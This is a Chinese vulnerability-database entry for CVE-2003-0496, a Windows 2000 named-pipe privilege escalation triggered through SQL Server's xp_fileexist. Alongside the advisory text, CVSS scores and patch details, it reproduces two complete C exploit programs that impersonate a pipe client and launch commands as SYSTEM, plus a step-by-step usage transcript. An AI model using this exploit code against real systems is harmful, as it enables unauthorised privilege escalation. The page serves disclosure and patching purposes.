CVE-2003-0496
CVSS7.2
发布时间 :2003-08-18 00:00:00
修订时间 :2016-10-17 22:34:40
NMCOES    

[原文]Microsoft SQL Server before Windows 2000 SP4 allows local users to gain privileges as the SQL Server user by calling the xp_fileexist extended stored procedure with a named pipe as an argument instead of a normal file.


[CNNVD]Windows有名管道文件名本地权限提升漏洞(CNNVD-200308-060)

        
        Microsoft Windows是微软开发的视窗操作系统。
        通过指定文件代替有名管道名作为SQL Server xp_fileexist存储扩展的参数,可导致以用户帐户SQL权限或者其他服务进程权限运行此文件,可能导致权限提升。
        漏洞是由于CreateFile系统调用的操作和可劫持冒充Windows有名管道。API调用CreateFile用来打开或建立文件,有名管道,Mail slot等,不过没有任何机制来限制这个API调用打开何种资源。WIN32中多数服务运行在系统帐户下并以一定方式处理文件,如果可以通过指定文件让服务打开的方法,就可能以此服务的帐户运行。另外如果使用了UNC路径,在冒充管道客户端前就不需要在有名管道上进行读操作。
        通过Microsoft SQL服务器可方便利用此漏洞,因为SQL服务器有大量过程调用可以指定要使用的文件,如使用xp_fileexist,这个扩展存储过程可以全局可执行,通过建立任意名的有名管道服务器并使用有名管道的UNC名作为参数执行xp_fileexit,就可以冒充SQL服务器帐户权限执行文件。
        其他服务也可能存在此类漏洞。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2000::sp3:professionalMicrosoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_2000_terminal_services::sp2
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_2000::sp3:advanced_serverMicrosoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp3:serverMicrosoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000_terminal_services::sp3
cpe:/o:microsoft:windows_2000::sp3:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP3
cpe:/o:microsoft:windows_2000_terminal_services::sp1
cpe:/o:microsoft:windows_2000::sp1:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2000::sp2:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000_terminal_services
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0496
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0496
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-060
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0013.html
(VENDOR_ADVISORY)  VULNWATCH  20030709 Pipe Filename Local Privilege Escalation FAQ
http://marc.info/?l=bugtraq&m=105820282607865&w=2
(UNKNOWN)  BUGTRAQ  20030714 @stake named pipe exploit
http://marc.info/?l=bugtraq&m=105830986720243&w=2
(UNKNOWN)  BUGTRAQ  20030715 CreateFile exploit, (working)
http://www.atstake.com/research/advisories/2003/a070803-1.txt
(VENDOR_ADVISORY)  ATSTAKE  A070803-1

- 漏洞信息

Windows有名管道文件名本地权限提升漏洞
高危 设计错误
2003-08-18 00:00:00 2005-10-20 00:00:00
本地  
        
        Microsoft Windows是微软开发的视窗操作系统。
        通过指定文件代替有名管道名作为SQL Server xp_fileexist存储扩展的参数,可导致以用户帐户SQL权限或者其他服务进程权限运行此文件,可能导致权限提升。
        漏洞是由于CreateFile系统调用的操作和可劫持冒充Windows有名管道。API调用CreateFile用来打开或建立文件,有名管道,Mail slot等,不过没有任何机制来限制这个API调用打开何种资源。WIN32中多数服务运行在系统帐户下并以一定方式处理文件,如果可以通过指定文件让服务打开的方法,就可能以此服务的帐户运行。另外如果使用了UNC路径,在冒充管道客户端前就不需要在有名管道上进行读操作。
        通过Microsoft SQL服务器可方便利用此漏洞,因为SQL服务器有大量过程调用可以指定要使用的文件,如使用xp_fileexist,这个扩展存储过程可以全局可执行,通过建立任意名的有名管道服务器并使用有名管道的UNC名作为参数执行xp_fileexit,就可以冒充SQL服务器帐户权限执行文件。
        其他服务也可能存在此类漏洞。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        下载安装Windows service pack 4:
        
        http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/

- 漏洞信息 (22882)

Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (1) (EDBID:22882)
windows local
2003-07-08 Verified
0 Maceo
N/A [点击下载]
source: http://www.securityfocus.com/bid/8128/info

It has been reported that Microsoft Windows does not properly handle named pipes through the CreateFile API. Because of this, an attacker may be able to gain access to the SYSTEM account.


/*  tac0tac0.c - pay no attention to the name, long
story...
  *
  *  Author:  Maceo
  *  Modified to take advantage of CAN-2003-0496 Named
Pipe Filename
  *  Local Privilege Escalation Found by @stake. Use with
their Advisory.
  *  -wirepair@sh0dan.org http://sh0dan.org
  *
  *
  *  All credits for code go to Maceo, i really did
minimal work
  *  with his code, it took me like 3 seconds heh.
  *  Shouts to #innercircle,
  *
  */


#include <stdio.h>
#include <windows.h>


int main(int argc, char **argv)
{
   DWORD dwNumber = 0;
   DWORD dwType = REG_DWORD;
   DWORD dwSize = sizeof(DWORD);

   if (argc != 2) {
	  fprintf(stderr, "Usage: %s <cmd.exe>\nNamed Pipe Local
Priv Escalation found by @stake.\n"
					   "This code is to be used with MS-SQL exactly as
outlined in their advisory\n"
					   "All credit for this code goes to Maceo, he did a
fine job.. -wire\n",argv[0]);
					   exit(1);
   }
   // build the next named pipe name //
   char szPipe[64];
   //sprintf(szPipe, "\\\\.\\pipe\\net\\NtControlPipe%lu",
++dwNumber);
   sprintf(szPipe, "\\\\.\\pipe\\poop");

   // create the named pipe before scm can //
   HANDLE hPipe = 0;
   hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,
                            PIPE_TYPE_MESSAGE|PIPE_WAIT,
                            2, 0, 0, 0, NULL);
   if (hPipe == INVALID_HANDLE_VALUE)
   {
     printf ("Failed to create named pipe:\n  %s\n",
szPipe);
     return 3;
   }


   ConnectNamedPipe (hPipe, NULL);

   // assume the identity of the client //
   if (!ImpersonateNamedPipeClient (hPipe))
   {
     printf ("Failed to impersonate the named pipe.\n");
     CloseHandle(hPipe);
     return 5;
   }


   // display impersonating users name //
   dwSize  = 256;
   char szUser[256];
   GetUserName(szUser, &dwSize);
   printf ("Impersonating: %s\n", szUser);

   system(argv[1]);
   CloseHandle(hPipe);
   return 0;
}		

- 漏洞信息 (22883)

Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (2) (EDBID:22883)
windows local
2003-07-08 Verified
0 Maceo
N/A [点击下载]
source: http://www.securityfocus.com/bid/8128/info
 
It has been reported that Microsoft Windows does not properly handle named pipes through the CreateFile API. Because of this, an attacker may be able to gain access to the SYSTEM account.

/*  tac0tac0.c - pay no attention to the name, long
story...
  *
  *
  *
  *  Author:  Maceo
  *  Modified to take advantage of CAN-2003-0496 Named
Pipe Filename
  *  Local Privilege Escalation Found by @stake. Use with
their advisory
  *  -wirepair@sh0dan.org
http://sh0dan.org/files/tac0tac0.c
  *
  *
  *  All credits for code go to Maceo, i really did
minimal work
  *  with his code, it took me like 3 seconds heh.
  *  Shouts to #innercircle,
  *
  */


#include <stdio.h>
#include <windows.h>


int main(int argc, char **argv)
{
   char szPipe[64];
   DWORD dwNumber = 0;
   DWORD dwType = REG_DWORD;
   DWORD dwSize = sizeof(DWORD);
   DWORD dw = GetLastError();
   HANDLE hToken, hToken2;
   PGENERIC_MAPPING pGeneric;
   SECURITY_ATTRIBUTES sa;
   DWORD dwAccessDesired;
   PACL pACL = NULL;
   PSECURITY_DESCRIPTOR pSD = NULL;
   STARTUPINFO si;
   PROCESS_INFORMATION pi;


   if (argc != 2) {
	  fprintf(stderr, "Usage: %s <cmd.exe>\nNamed Pipe Local
Priv Escalation found by @stake.\n"
					   "This code is to be used with MS-SQL exactly as
outlined in their advisory\n"
					   "All credit for this code goes to Maceo, he did a
fine job.. -wire\n"
					   "Also thanks goes to brett Moore for helping me
with DuplicateTokenEx, thanks buddy guy!\n",argv[0]);
					   exit(1);
   }
   memset(&si,0,sizeof(si));
   sprintf(szPipe, "\\\\.\\pipe\\poop");

   // create the named pipe
   HANDLE hPipe = 0;
   hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,
PIPE_TYPE_MESSAGE|PIPE_WAIT, 2, 0, 0, 0, NULL);
   if (hPipe == INVALID_HANDLE_VALUE) {
     printf ("Failed to create named pipe:\n  %s\n",
szPipe);
     return 3;
   }
   printf("Created Named Pipe: \\\\.\\pipe\\poop\n");

   // setup security attribs
   pSD = (PSECURITY_DESCRIPTOR) LocalAlloc(LPTR,
SECURITY_DESCRIPTOR_MIN_LENGTH);
   InitializeSecurityDescriptor(pSD,
SECURITY_DESCRIPTOR_REVISION);
   SetSecurityDescriptorDacl(pSD,TRUE, pACL, FALSE);
   sa.nLength = sizeof (SECURITY_ATTRIBUTES);
   sa.lpSecurityDescriptor = pSD;
   sa.bInheritHandle = FALSE;

   printf("Waiting for connection...\n");
   // wait for client to connect
   ConnectNamedPipe (hPipe, NULL);

   // assume the identity of the client //
   if (!ImpersonateNamedPipeClient (hPipe)) {
     printf ("Failed to impersonate the named pipe.\n");
     CloseHandle(hPipe);
     return 5;
   }

   if (!OpenThreadToken(GetCurrentThread(),
TOKEN_ALL_ACCESS, TRUE, &hToken )) {
	     if (hToken != INVALID_HANDLE_VALUE) {
			 printf("GetLastError: %u\n", dw);
              CloseHandle(hToken);
			 exit(0);
		 }
   }

   printf("Duplicating Token...\n");
   if(DuplicateTokenEx(hToken,MAXIMUM_ALLOWED,&sa,SecurityImpersonation,
TokenPrimary,&hToken2) == 0) {
	  printf("error in duplicate token\n");
	  printf("GetLastError: %u\n", dw);
	  exit(0);
   }
   MapGenericMask( &dwAccessDesired, pGeneric );

   // display impersonating users name
   dwSize  = 256;
   char szUser[256];
   GetUserName(szUser, &dwSize);
   printf ("Impersonating: %s\n", szUser);

   si.cb = sizeof(si);
   si.lpDesktop = NULL;

   printf("Creating New Process %s\n", argv[1]);
   if(!CreateProcessAsUser(hToken2, NULL, argv[1], &sa,
&sa,true, NORMAL_PRIORITY_CLASS |
CREATE_NEW_CONSOLE,NULL,NULL,&si, &pi)) {
      printf("GetLastError: %u\n", dw);
   }
   CloseHandle(hPipe);

   return 0;
}
		

- 漏洞信息

10126
Microsoft SQL Server CreateFile API Function Privilege Escalation

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-07-08 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft Windows CreateFile API Named Pipe Privilege Escalation Vulnerability
Design Error 8128
No Yes
2003-07-08 12:00:00 2009-07-11 10:56:00
Discovery credited to Andreas Junestam.

- 受影响的程序版本

Microsoft Windows 2000 Terminal Services SP3
+ Microsoft Windows 2000 Advanced Server SP3
+ Microsoft Windows 2000 Datacenter Server SP3
+ Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Terminal Services SP4
+ Microsoft Windows 2000 Advanced Server SP4
+ Microsoft Windows 2000 Datacenter Server SP4
+ Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4

- 不受影响的程序版本

Microsoft Windows 2000 Terminal Services SP4
+ Microsoft Windows 2000 Advanced Server SP4
+ Microsoft Windows 2000 Datacenter Server SP4
+ Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4

- 漏洞讨论

It has been reported that Microsoft Windows does not properly handle named pipes through the CreateFile API. Because of this, an attacker may be able to gain access to the SYSTEM account.

- 漏洞利用

C:\&gt;mssqlpipe.exe cmd.exe
Creating pipe: \\.\Pipe\atstake
Pipe created, waiting for connectection
Connect to the database (with isql for example) and execute:
xp_fileexist '\\SERVERNAME\pipe\atsstake'

Then in command shell #2:

C:\&gt;isql -U andreas
Password:
1&gt; xp_fileexist '\\TEMP123\pipe\atstake'
2&gt; go
File Exists File is a Directory Parent Directory Exists
----------- ------------------- -----------------------
1 0 1

Then, back in command shell #1:

Impersonate user successful, we are running as user: SYSTEM

A functional version of the tac0tac0.c exploit has been released. The developer of the exploit has advised users to build the exploit in Release mode (and not Debug mode).

- 解决方案

This issue has been resolved in Windows 2000 Service Pack 4:


Microsoft Windows 2000 Professional

Microsoft Windows 2000 Server SP2

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows 2000 Advanced Server SP1

Microsoft Windows 2000 Advanced Server SP2

Microsoft Windows 2000 Terminal Services SP3

Microsoft Windows 2000 Professional SP1

Microsoft Windows 2000 Server SP3

Microsoft Windows 2000 Terminal Services SP2

Microsoft Windows 2000 Server SP1

Microsoft Windows 2000 Professional SP3

Microsoft Windows 2000 Professional SP2

Microsoft Windows 2000 Terminal Services SP1

Microsoft Windows 2000 Advanced Server

Microsoft Windows 2000 Server

Microsoft Windows 2000 Terminal Services

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站